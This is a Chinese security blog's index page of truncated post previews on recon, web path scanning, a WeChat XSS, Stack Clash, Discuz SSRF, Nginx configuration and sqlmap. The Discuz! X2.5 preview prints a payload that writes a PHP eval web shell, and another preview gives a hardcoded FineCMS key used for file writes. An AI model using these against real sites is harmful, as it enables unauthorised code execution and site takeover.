工具分享 + 更多

2018-05-21  ℃   0
 0 

一.得到目标网站第一步我们该做什么? 1.查看审核元素 (浏览器插件顶替) 2.判断网站类型 3.查看网站功能 4.检测敏感端口 5.检测其他资产 6.收集公司(个人)信息 7.查看C段(忽略) 一.① 这些有什么用?(参照上面) 第一步主要是看审核元素得到返回头信息能得到中间件,服务器,程序编程语言信息,Javascript版本信息。 中间件:(iis一定支持asp,asa,cer)(apach

2018

人必其自爱也,而后人爱诸;人必其自敬也,而后人敬诸。

web路径探测工具 7kbscan-WebPathBrute 1.5.2 (集成三字典)

————————-邪恶的分割线——————————– 使用与更新说明 1.5.2 Beta 2017-08-06 一、接受建议加入cookie功能 二、接受建议修改对URL的处理方法 去掉多余的 ‘/’ 三、对3xx结果 显示跳转后地址 http://www.xxx.xxx/admin/index.php ——–> login_redir.php 1.5.1 Beta 2017-08-05

微信之又弹了xss…思路666

首先需要测试请自备2台手机,如果没有跟我一样还原数据,好多群里保存的图片都没了,尴尬。 慎用!!!!前方高能!!! 一、点击设置 -> 账号与安全 -> 登录设备管理(安卓机子就是账号保护) -> 具体图如下: 二、如果直接编辑,设备信息是过滤了的,如下图: 而且长度只能在5-10个字符 三、重要点来了,就是IOS和安卓都有个功能,如下图: 保存手机名称 这里设置好后,退出微信登

Linux中的Stack Clash漏洞,可被黑客利用获取本地root权限

上个月,Qualys的安全研究人员在多种基于Unix的系统上发现名为“Stack Clash”的漏洞,该漏洞能让攻击者在UNIX系统上获得root权限,并接管这台受到攻击的计算机。目前安全研究人员发现了这个缺陷,正与各种供应商合作,尽早发布修复程序。 LinuxPenguin.png 据 Qualys 的研究人员介绍,这个问题影响了许多 UNIX 系统,如 Linux,OpenBSD,NetBSD

渗透文章 + 更多

Discuz ssrf漏洞利用的几个python脚本

Discuz ssrf漏洞利用的几个python脚本

2017-08-7  ℃  0
 0 

扫描本机开放的端口: #!/usr/bin/env python # -*- coding: utf-8 -*- # @Author: Lcy # @Date:   2016-07-05 20:55:30 # @Last Modified by:   Lcy # @Last Modified time: 2016-10-10 16:26:14 import requests import thre

Discuz! X2.5 远程代码执行漏洞及EXP 0day

Discuz! X2.5 远程代码执行漏洞及EXP 0day

1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了 3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码 <?php @eval($_POST[

FineCMS SYS_KEY未初始化导致任意文件写入

FineCMS SYS_KEY未初始化导致任意文件写入

起初我以为这个sys_key是随机生成的.然后我本地和vps上发现都是一样的.最后去看了下源码发现没有生成这个值的地方.最后的最后看了开源的地址http://git.oschina.net/dayrui/finecms/blob/master/v5/config/system.php 发现是固定值 24b16fede9a67c9251d3e7c7161c83ac 文件:finecms/dayrui

浅谈Web渗透测试中的信息收集

浅谈Web渗透测试中的信息收集

下面一张图比较详细的介绍了渗透测试中的信息收集,看过许多 freebuf 大牛写的文章,今天也给大家分享一些自己的经验(也就一小白,错误的地方各位牛牛多多指正)。  信息收集对于渗透测试可以说是重中之重,正所谓“知己知彼,百战不殆”。所以我们的信息收集也是一样,收集的信息自然也是越多越好,这里有个文章http://www.doc88.com/p-7784047461299.html,这里的PTES

三个案例看Nginx配置安全

三个案例看Nginx配置安全

之前在Sec-News中推荐了一个开源程序 https://github.com/yandex/gixy ,作用是来检测Nginx配置文件中存在的问题。正好Pwnhub上周的比赛也出现了一道题,包含由Nginx配置错误导致的漏洞。 所以我挑选我觉得比较有趣,而且很有可能犯错误的三个典型案例,来说说Nginx配置文件的安全。 另外,本文所涉及的三个案例,均已上线到Vulhub( https://gi

Sqlmap使用教程【个人笔记精华整理】

Sqlmap使用教程【个人笔记精华整理】

sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 sqlmap教程 sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲


扫一扫二维码分享
00:00/00:00